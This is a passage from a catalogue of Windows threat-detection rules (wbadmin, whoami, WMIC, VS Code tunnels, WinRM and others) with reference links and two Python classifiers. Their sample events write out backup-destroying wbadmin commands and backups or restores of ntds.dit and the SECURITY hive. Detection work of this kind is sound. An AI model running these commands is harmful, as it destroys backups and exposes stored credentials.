Detects the pattern of UAC bypass via WSReset, usable with the default sysmon-config |
https://lolbas-project.github.io/lolbas/Binaries/Wsreset/, https://github.com/hfiref0x/UACME, https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf |
Use of UltraVNC Remote Access Software |
An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks |
https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md |
Suspicious UltraVNC Execution |
Detects suspicious UltraVNC command-line flag combinations that indicate an auto-reconnect upon execution, e.g. at startup (as seen being used by the Gamaredon threat group) |
https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine, https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution, https://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html |
Uninstall Crowdstrike Falcon Sensor |
Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
Windows Credential Manager Access via VaultCmd |
Detects listing of credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd |
Uncommon Userinit Child Process |
Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence. |
https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html, https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core |
Verclsid.exe Runs COM Object |
Detects when verclsid.exe is used to run a COM object via its GUID |
https://lolbas-project.github.io/lolbas/Binaries/Verclsid/, https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5, https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ |
Detect Virtualbox Driver Installation OR Starting Of VMs |
Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM. |
https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/, https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/ |
Suspicious VBoxDrvInst.exe Parameters |
Detects VBoxDrvInst.exe run with parameters that allow processing of an INF file.
This allows creating values in the registry and installing drivers.
For example, one could use this technique to obtain persistence by modifying one of the Run or RunOnce registry keys
|
https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml, https://twitter.com/pabraeken/status/993497996179492864 |
Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script |
Detects execution of "VMwareToolBoxCmd.exe" with the "script" and "set" flags to set up a script that runs on a specific VM state change |
https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/, https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/ |
Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script |
Detects execution of "VMwareToolBoxCmd.exe" with the "script" and "set" flags to set up a script located in a potentially suspicious location to run on a specific VM state change |
https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ |
VMToolsd Suspicious Child Process |
Detects suspicious child process creations of VMware Tools process which may indicate persistence setup |
https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/, https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png, https://github.com/vmware/open-vm-tools/blob/master/open-vm-tools/tools.conf |
Potentially Suspicious Child Process Of VsCode |
Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles. |
https://twitter.com/nas_bench/status/1618021838407495681, https://twitter.com/nas_bench/status/1618021415852335105 |
Visual Studio Code Tunnel Execution |
Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel |
https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://code.visualstudio.com/docs/remote/tunnels |
Visual Studio Code Tunnel Shell Execution |
Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system. |
https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://code.visualstudio.com/docs/remote/tunnels |
Renamed Visual Studio Code Tunnel Execution |
Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel |
https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://code.visualstudio.com/docs/remote/tunnels |
Visual Studio Code Tunnel Service Installation |
Detects the installation of VsCode tunnel (code-tunnel) as a service. |
https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://code.visualstudio.com/docs/remote/tunnels |
Potential Binary Proxy Execution Via VSDiagnostics.EXE |
Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries. |
https://twitter.com/0xBoku/status/1679200664013135872 |
Suspicious Vsls-Agent Command With AgentExtensionPath Load |
Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter |
https://twitter.com/bohops/status/1583916360404729857 |
Use of W32tm as Timer |
When configured with suitable command line arguments, w32tm can act as a delay mechanism |
https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md, https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains |
Wab Execution From Non Default Location |
Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non-default locations, as seen in Bumblebee activity |
https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime, https://thedfirreport.com/2022/09/26/bumblebee-round-two/ |
Wab/Wabmig Unusual Parent Or Child Processes |
Detects unusual parent or child processes of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool), as seen in Bumblebee activity |
https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime, https://thedfirreport.com/2022/09/26/bumblebee-round-two/ |
All Backups Deleted Via Wbadmin.EXE |
Detects the deletion of all backups or system state backups via "wbadmin.exe".
This technique is used by numerous ransomware families and actors.
This may only be successful on server platforms that have Windows Backup enabled.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell, https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md, https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/, https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted, https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup |
Windows Backup Deleted Via Wbadmin.EXE |
Detects the deletion of backups or system state backups via "wbadmin.exe".
This technique is used by numerous ransomware families and actors.
This may only be successful on server platforms that have Windows Backup enabled.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell, https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md, https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/, https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted, https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup |
Sensitive File Dump Via Wbadmin.EXE |
Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
|
https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml, https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup |
File Recovery From Backup Via Wbadmin.EXE |
Detects the recovery of files from backups via "wbadmin.exe".
Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.
|
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery, https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/ |
Sensitive File Recovery From Backup Via Wbadmin.EXE |
Detects the recovery of highly sensitive files such as "NTDS.DIT" and the "SECURITY" hive from a backup.
Attackers can leverage the "wbadmin" utility to restore such files in order to extract credentials or other sensitive information.
|
https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml, https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup |
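The five wbadmin rules above split one utility into deletion, dump and recovery cases. The following is an added example (not Sigma's own rule logic or any project code) that runs that split over constructed Sysmon-style process-creation events; the list of credential-bearing file fragments and the sample command lines are assumptions for illustration.

```python
# Constructed sample process-creation events (Sysmon-style field names);
# none of these are real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbadmin.exe",
     "CommandLine": "wbadmin delete catalog -quiet"},
    {"Image": r"C:\Windows\System32\wbadmin.exe",
     "CommandLine": "wbadmin.exe delete systemstatebackup -keepVersions:0"},
    {"Image": r"C:\Windows\System32\wbadmin.exe",
     "CommandLine": "wbadmin delete backup -version:01/15/2024-09:30 -quiet"},
    {"Image": r"C:\Windows\System32\wbadmin.exe",
     "CommandLine": r"wbadmin start recovery -version:01/15/2024-09:30 -itemType:File "
                    r"-items:C:\Windows\NTDS\ntds.dit -recoveryTarget:C:\Temp -quiet"},
    {"Image": r"C:\Windows\System32\wbadmin.exe",
     "CommandLine": r"wbadmin start backup -backupTarget:\\fileserver\share "
                    r"-include:C:\Windows\System32\config\SECURITY -quiet"},
    {"Image": r"C:\Windows\System32\wbadmin.exe",
     "CommandLine": r"wbadmin start recovery -version:01/15/2024-09:30 -itemType:File "
                    r"-items:C:\Data\report.docx -recoveryTarget:C:\Temp"},
    {"Image": r"C:\Windows\System32\wbadmin.exe",
     "CommandLine": "wbadmin get versions"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c echo wbadmin delete catalog -quiet"},
]

# Path fragments that mark credential-bearing files (assumed list, lower-case).
SENSITIVE_TARGETS = ("ntds.dit", r"\config\security", r"\config\sam", r"\config\system")


def classify_wbadmin(event):
    """Return a label for one event, or None if no wbadmin rule applies.

    Labels: all_backups_deleted, backup_deleted, sensitive_file_dump,
    sensitive_file_recovery, file_recovery.
    """
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    if not image.endswith("\\wbadmin.exe"):
        return None  # key on the wbadmin image, not on echoed text in other processes
    tokens = cmd.split()
    if "delete" in tokens:
        # "delete catalog" wipes the backup catalog; "-keepversions:0" keeps nothing
        if "catalog" in tokens or "-keepversions:0" in tokens:
            return "all_backups_deleted"
        if "backup" in tokens or "systemstatebackup" in tokens:
            return "backup_deleted"
    if "start" in tokens and ("backup" in tokens or "recovery" in tokens):
        if any(target in cmd for target in SENSITIVE_TARGETS):
            # a backup *of* ntds.dit is a dump; a restore of it is a recovery
            return "sensitive_file_dump" if "backup" in tokens else "sensitive_file_recovery"
        if "recovery" in tokens:
            return "file_recovery"
    return None


def scan(events):
    """Return (index, label) pairs for every event that matches a rule."""
    hits = []
    for i, event in enumerate(events):
        label = classify_wbadmin(event)
        if label:
            hits.append((i, label))
    return hits


if __name__ == "__main__":
    for i, label in scan(SAMPLE_EVENTS):
        print(i, label, SAMPLE_EVENTS[i]["CommandLine"])
```

The image check matters: the last sample only echoes a wbadmin command from cmd.exe and must not fire. Note that a benign "delete backup" of one old version and a destructive "-keepVersions:0" share the same verb, so the version-keeping switch is what separates the two severities.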
Potentially Suspicious WebDAV LNK Execution |
Detects possible execution via LNK file accessed on a WebDAV server. |
https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html, https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462 |
Chopper Webshell Process Pattern |
Detects patterns found in process executions caused by China Chopper-like tiny (ASPX) webshells |
https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/ |
Webshell Hacking Activity Patterns |
Detects certain parent-child patterns found in cases in which a web shell is used to perform credential dumping or exfiltration activities on a compromised system
|
https://youtu.be/7aemGhaE9ds?t=641 |
Webshell Detection With Command Line Keywords |
Detects certain command line parameters often used during reconnaissance activity via web shells |
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html, https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/, https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild |
Suspicious Process By Web Server Process |
Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
|
https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF |
Potential Credential Dumping Via WER |
Detects potential credential dumping via the LSASS Shtinkering technique, which abuses Windows Error Reporting to dump the lsass process |
https://github.com/deepinstinct/Lsass-Shtinkering, https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf |
Webshell Tool Reconnaissance Activity |
Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands
|
https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html |
Potential ReflectDebugger Content Execution Via WerFault.EXE |
Detects execution of "WerFault.exe" with the "-pr" command-line flag, which runs the file referenced by the ReflectDebugger registry key. An attacker can store the path to their malware in that key in order to masquerade the execution flow |
https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html, https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/ |
Suspicious Child Process Of Wermgr.EXE |
Detects suspicious Windows Error Reporting manager (wermgr.exe) child process |
https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html, https://www.echotrail.io/insights/search/wermgr.exe, https://github.com/binderlabs/DirCreate2System |
Suspicious Execution Location Of Wermgr.EXE |
Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location. |
https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html, https://www.echotrail.io/insights/search/wermgr.exe, https://github.com/binderlabs/DirCreate2System |
Suspicious File Download From IP Via Wget.EXE |
Detects potentially suspicious file downloads directly from IP addresses using Wget.exe |
https://www.gnu.org/software/wget/manual/wget.html |
Suspicious File Download From File Sharing Domain Via Wget.EXE |
Detects potentially suspicious file downloads from file sharing domains using wget.exe |
https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/ |
Suspicious File Download From IP Via Wget.EXE - Paths |
Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe |
https://www.gnu.org/software/wget/manual/wget.html |
Suspicious Where Execution |
Detects execution of "where.exe" to locate browser bookmark files. Adversaries may enumerate browser bookmarks to learn more about compromised hosts.
Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about
internal network resources such as servers, tools/dashboards, or other related infrastructure.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md |
Enumerate All Information With Whoami.EXE |
Detects the execution of "whoami.exe" with the "/all" flag |
https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/, https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s |
Whoami Utility Execution |
Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation |
https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ |
Whoami.EXE Execution From Privileged Process |
Detects the execution of "whoami.exe" by privileged accounts, which are often abused by threat actors |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/ |
Group Membership Reconnaissance Via Whoami.EXE |
Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami |
Whoami.EXE Execution With Output Option |
Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as the output format, or with redirection operators to export the results to a file for later use. |
https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/, https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s |
Whoami.EXE Execution Anomaly |
Detects the execution of whoami.exe with suspicious parent processes. |
https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/, https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s |
Security Privileges Enumeration Via Whoami.EXE |
Detects whoami.exe executed with the /priv command-line flag, which shows all privileges of the current user. This is often used after a privilege escalation attempt. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami |
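The six whoami rules above differ only in which field they key on: the flag, the output redirection, the parent or the account. As an added example (not Sigma's rule logic or any project's code), the following classifier applies all of them to constructed Sysmon-style events in one pass; the baseline parent set and the privileged-account list are assumptions for illustration.

```python
# Constructed sample process-creation events (Sysmon-style field names);
# none of these are real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\whoami.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "User": r"CORP\alice", "CommandLine": "whoami /all"},
    {"Image": r"C:\Windows\System32\whoami.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "User": r"CORP\alice", "CommandLine": r"whoami /priv > C:\Users\Public\p.txt"},
    {"Image": r"C:\Windows\System32\whoami.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "User": r"CORP\alice", "CommandLine": "whoami /groups /fo csv"},
    {"Image": r"C:\Windows\System32\whoami.exe", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "User": r"IIS APPPOOL\DefaultAppPool", "CommandLine": "whoami"},
    {"Image": r"C:\Windows\System32\whoami.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "User": r"NT AUTHORITY\SYSTEM", "CommandLine": "whoami"},
    {"Image": r"C:\Windows\System32\whoami.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "User": r"CORP\alice", "CommandLine": "whoami"},
]

# Parents from which an interactive whoami is unremarkable (assumed baseline).
EXPECTED_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Accounts whose use of whoami deserves a second look (assumed list).
PRIVILEGED_USERS = {r"nt authority\system", r"nt authority\local service",
                    r"nt authority\network service"}


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def classify_whoami(event):
    """Return the list of rule labels one event triggers (empty if not whoami.exe)."""
    if basename(event.get("Image", "")) != "whoami.exe":
        return []
    cmd = event.get("CommandLine", "").lower()
    # whoami accepts both "/flag" and "-flag"; normalise to the bare flag name
    flags = {t.lstrip("/-") for t in cmd.split() if t.startswith(("/", "-"))}
    labels = []
    if "all" in flags:
        labels.append("all_information")
    if "priv" in flags:
        labels.append("privileges")
    if "groups" in flags:
        labels.append("group_membership")
    if "fo" in flags or ">" in cmd:          # CSV output or shell redirection to a file
        labels.append("output_to_file")
    if basename(event.get("ParentImage", "")) not in EXPECTED_PARENTS:
        labels.append("anomalous_parent")    # e.g. a web server worker running whoami
    if event.get("User", "").lower() in PRIVILEGED_USERS:
        labels.append("privileged_user")
    if not labels:
        labels.append("plain_execution")     # the low-severity "Whoami Utility Execution" case
    return labels


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(classify_whoami(event), "<-", event["ParentImage"], "|", event["CommandLine"])
```

The redirection check relies on the full command line being logged; if your telemetry truncates it or the shell builtin handles the redirect before spawning whoami, only the "/fo" form is visible in the child process.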
Suspicious WindowsTerminal Child Processes |
Detects suspicious child processes spawned via the Windows Terminal application, which could be a sign of persistence via Windows Terminal profiles (see references section) |
https://persistence-info.github.io/Data/windowsterminalprofile.html, https://twitter.com/nas_bench/status/1550836225652686848 |
Add New Download Source To Winget |
Detects usage of winget to add new additional download sources |
https://learn.microsoft.com/en-us/windows/package-manager/winget/source, https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget |
Add Insecure Download Source To Winget |
Detects usage of winget to add a new insecure (http) download source.
Winget will not allow the addition of insecure sources, so such an attempt could indicate suspicious activity (or a typo)
|
https://learn.microsoft.com/en-us/windows/package-manager/winget/source, https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget |
Add Potential Suspicious New Download Source To Winget |
Detects usage of winget to add new potentially suspicious download sources |
https://learn.microsoft.com/en-us/windows/package-manager/winget/source, https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget |
Install New Package Via Winget Local Manifest |
Detects usage of winget to install applications via a manifest file. Adversaries can abuse winget to download payloads remotely and execute them.
The manifest option lets a user install an application by passing a YAML file directly to the client.
Winget then downloads and installs the exe, msi or msix file referenced by the manifest.
|
https://learn.microsoft.com/en-us/windows/package-manager/winget/install#local-install, https://lolbas-project.github.io/lolbas/Binaries/Winget/, https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget |
Winrar Compressing Dump Files |
Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. |
https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ |
Potentially Suspicious Child Process Of WinRAR.EXE |
Detects potentially suspicious child processes of WinRAR.exe. |
https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/, https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md |
Winrar Execution in Non-Standard Folder |
Detects a suspicious winrar execution in a folder which is not the default installation folder |
https://twitter.com/cyb3rops/status/1460978167628406785 |
AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl |
Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) |
https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 |
Remote Code Execute via Winrm.vbs |
Detects an attempt to execute code or create service on remote host via winrm.vbs. |
https://twitter.com/bohops/status/994405551751815170, https://redcanary.com/blog/lateral-movement-winrm-wmi/, https://lolbas-project.github.io/lolbas/Scripts/Winrm/ |
Remote PowerShell Session Host Process (WinRM) |
Detects remote PowerShell sessions by monitoring for wsmprovhost (WinRM host process) as a parent or child process (a sign of an active PowerShell remoting session). |
https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html |
Suspicious Processes Spawned by WinRM |
Detects suspicious processes, including shells, spawned from the WinRM host process |
Internal Research |
Compress Data and Lock With Password for Exfiltration With WINZIP |
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md |
Wlrmdr.EXE Uncommon Argument Or Child Process |
Detects the execution of "Wlrmdr.exe" with the "-u" command-line flag, which passes whatever follows it as an argument to the ShellExecute API and therefore lets an attacker execute arbitrary binaries.
This detection also covers any uncommon child processes spawned from "Wlrmdr.exe", as a supplement for environments that possess "ParentImage" telemetry.
|
https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ, https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/ |
New ActiveScriptEventConsumer Created Via Wmic.EXE |
Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence |
https://twitter.com/johnlatwc/status/1408062131321270282?s=12, https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf |
Potential Windows Defender Tampering Via Wmic.EXE |
Detects potential tampering with Windows Defender settings, such as adding exclusions, via wmic |
https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md, https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/, https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/ |
New Process Created Via Wmic.EXE |
Detects new process creation using WMIC via the "process call create" flag |
https://www.sans.org/blog/wmic-for-incident-response/, https://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process |
Computer System Reconnaissance Via Wmic.EXE |
Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc. |
https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ |
Local Groups Reconnaissance Via Wmic.EXE |
Detects the execution of "wmic" with the "group" flag.
Adversaries may attempt to find local system groups and permission settings.
The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md |
Hardware Model Reconnaissance Via Wmic.EXE |
Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information |
https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/, https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks |
Windows Hotfix Updates Reconnaissance Via Wmic.EXE |
Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts |
https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat, https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html |
Process Reconnaissance Via Wmic.EXE |
Detects the execution of "wmic" with the "process" flag, which an adversary might use to list the processes running on the compromised host. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic |
Potential Product Reconnaissance Via Wmic.EXE |
Detects the execution of WMIC with the "product" alias in order to enumerate installed software, such as firewall and antivirus products |
